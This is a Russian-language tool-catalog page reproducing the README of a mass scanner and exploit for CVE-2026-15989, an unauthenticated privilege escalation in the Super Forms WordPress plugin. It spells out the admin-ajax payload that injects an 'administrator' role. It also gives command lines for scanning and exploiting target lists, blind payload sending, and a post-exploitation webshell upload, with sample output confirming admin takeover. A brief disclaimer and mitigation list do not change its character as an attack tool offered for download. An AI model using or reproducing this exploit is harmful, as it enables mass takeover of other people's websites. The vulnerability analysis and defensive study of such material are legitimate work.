Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

ЛентыКонтактыКонфиденциальность© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-15989 — Массовый сканер и эксплойт для CVE-2026-15989 — неаутентифицированного повышения привилегий в Super Forms <= 6.3.316, позволяющего создавать учётные записи администратора через параметр role. | Kitploit
Инструменты/GitHubGitHub/fl0ydsec/cve-2026-15989
Повышение привилегийСканеры уязвимостейГенерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийПост-эксплуатацияВеб-безопасностьТестирование на Проникновение
GitHubfl0ydsec/cve-2026-15989

CVE-2026-15989

6 ч 10 мин назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Массовый сканер и эксплойт для CVE-2026-15989 — неаутентифицированного повышения привилегий в Super Forms <= 6.3.316, позволяющего создавать учётные записи администратора через параметр role.

Репозиторий

CVE-2026-15989 — Super Forms ≤ 6.3.316 — PoC повышения привилегий без аутентификации

Super Forms – Drag & Drop Form Builder (WordPress) ≤ 6.3.316 — повышение привилегий без аутентификации через параметр role премиум-дополнения Register & Login.

CVE-2026-15989 CVSS WordPress Auth

Author Python Telegram


📋 Обзор уязвимости

АтрибутДетали
CVE IDCVE-2026-15989
Цепочкаформа регистрации → 'role' в $other_userdata → wp_insert_user(role=administrator) → ADMIN
Критичность🔴 КРИТИЧЕСКАЯ (CVSS 9.8)
ЦельSuper Forms – Drag & Drop Form Builder + премиум-дополнение Register & Login
Затронуто≤ 6.3.316 (ядро) — уязвимые сборки дополнения (v1.x)
Исправлено6.3.317
Требуется аутентификацияНет

🔍 Техническое описание

Дополнение устанавливает роль нового пользователя из настроек формы ($userdata['role'] = $settings['register_user_role']), затем перебирает $other_userdata — который содержит 'role' — и перезаписывает любой ключ значением, предоставленным клиентом ($data['role']['value']), перед вызовом wp_insert_user().

POST /wp-admin/admin-ajax.php  (unauthenticated)
        │
        ▼
action=super_submit_form + data={"role":{"value":"administrator"}, ...}
        │
        ▼
$other_userdata loop ─► $userdata['role'] = $data['role']['value']
        │
        ▼
wp_insert_user() ─► administrator account created
        │
        ▼
register_login_activation='login'/'auto' ─► wp_set_auth_cookie ─► admin session

Исправление (6.3.317): 'role' удалён из белого списка + get_safe_public_registration_role() (fail-closed).

Оригинальное исследование — протокол двойной отправки: ядро сменило протоколы на версии v5.0.0.

ЯдроДействиеФормат данныхNonce
4.xsuper_send_emailвложенные поля (data[role][value]=...)нет (проверки закомментированы)
5.x/6.xsuper_submit_formстрока JSONsf_nonce через super_create_nonce

Инструмент автоматически выбирает протокол на основе обнаруженной версии.


🚀 Использование

# mass scan + exploit
python CVE-2026-15989.py --list targets.txt --threads 10 --force --only-hits --results hits.txt --user Floydroot --password 'Floyd@2026!root'
python CVE-2026-15989.py --list targets.txt --threads 15 --timeout 6 --force --quiet --results hits.txt --user U --password P --no-dedup

# single target
python CVE-2026-15989.py --target TARGET --port 443 --user USER --password PASS --email EMAIL --insecure
python CVE-2026-15989.py --target TARGET --port 443 --user USER --password PASS --login --rce --insecure

# re-check an existing account without re-registering
python CVE-2026-15989.py --target TARGET --port 443 --user USER --password PASS --only-login --insecure
ОпцияОписание
--list FILEПо одной цели на строку; URL|form_id или URL|form_id=ID,email=X на строку
-u/--target, --portОдна цель
--threads, --timeout, --no-dedupНастройка массового режима
--forceОтправлять полезную нагрузку даже без обнаруженной формы регистрации
--only-hits / --quietДерево только для подтверждённых попаданий / минимальный вывод
--resetЗавершение verify-режима через lost-password (оператор вставляет ссылку сброса)
--only-loginПропустить регистрацию; войти и проверить роль через users/me
--login / --rceПостэксплуатация на реальной цели: подтверждение входа / загрузка плагина-вебшелла
-k/--insecureИгнорировать TLS

📊 Вывод

│  ├─ plugin   : 6.3.316 — VULNERABLE <= 6.3.316
│  ├─ addon    : v1.8.7
│  ├─ form     : 4169 (/register/)
│  ├─ proto    : 5.x/6.x (super_submit_form, JSON, sf_nonce)
│  ├─ payload  : HTTP 200 ✓ processed
│  └─ session  : cookie ✓ · admin confirmed — Floydroot/Floyd@2026!root
└─── ✔ ADMIN CONFIRMED
  • hits.txt — только подтверждённые цели (ts|url|status|detail, с пользователем/паролем)
  • прогресс-бар с ETA + счётчики по статусам; каждая фаза выводит реальную причину при сбое (WAF, краш, форма только для входа, неверный протокол...)

⚙️ Возможности

  • Двойной протокол (4.x вложенные данные / 5+ JSON+nonce) — автоматический выбор по версии
  • Определение версии: readme.txt Stable tag + common.js?ver=; проба дополнения + его собственная версия
  • Обнаружение формы регистрации: распространённые пути + sitemap.xml/wp-sitemap.xml/sitemap_index + ссылки с главной
  • Автозаполнение обязательных полей (включая скрытые/условные)
  • "already exists" → прямое подтверждение входа в существующую учётную запись
  • Контроль крашей: повторная отправка формы без внедрённой роли для отличия серверных проблем от крашей, вызванных инъекцией
  • Достоверное подтверждение администратора через /wp-json/wp/v2/users/me?context=edit (резерв: users.php / dashboard)

📁 Структура файлов

├── CVE-2026-15989.py   # mass scanner + exploit
├── README.md
├── LICENSE
└── .gitignore

⚠️ Отказ от ответственности

╔══════════════════════════════════════════════════════════════════╗
║                        LEGAL DISCLAIMER                          ║
╠══════════════════════════════════════════════════════════════════╣
║  This tool is provided for EDUCATIONAL and AUTHORIZED           ║
║  SECURITY TESTING purposes only.                                ║
║  Only use on systems you own or have explicit permission.       ║
║  The author is NOT responsible for any misuse or damage.        ║
╚══════════════════════════════════════════════════════════════════╝

🛡️ Меры защиты

  1. Обновите Super Forms до 6.3.317 (или новее) и смените все скомпрометированные учётные данные
  2. Поддерживайте дополнение Register & Login в актуальном состоянии (у него собственный цикл версий)
  3. Удалите/отключите опубликованные формы регистрации, если они не нужны
  4. Проверьте пользователей в wp-admin/ на наличие неожиданных учётных записей администратора

👤 Автор

fl0ydsec (Floydroot)

GitHub Telegram

Security Research

Скачать инструмент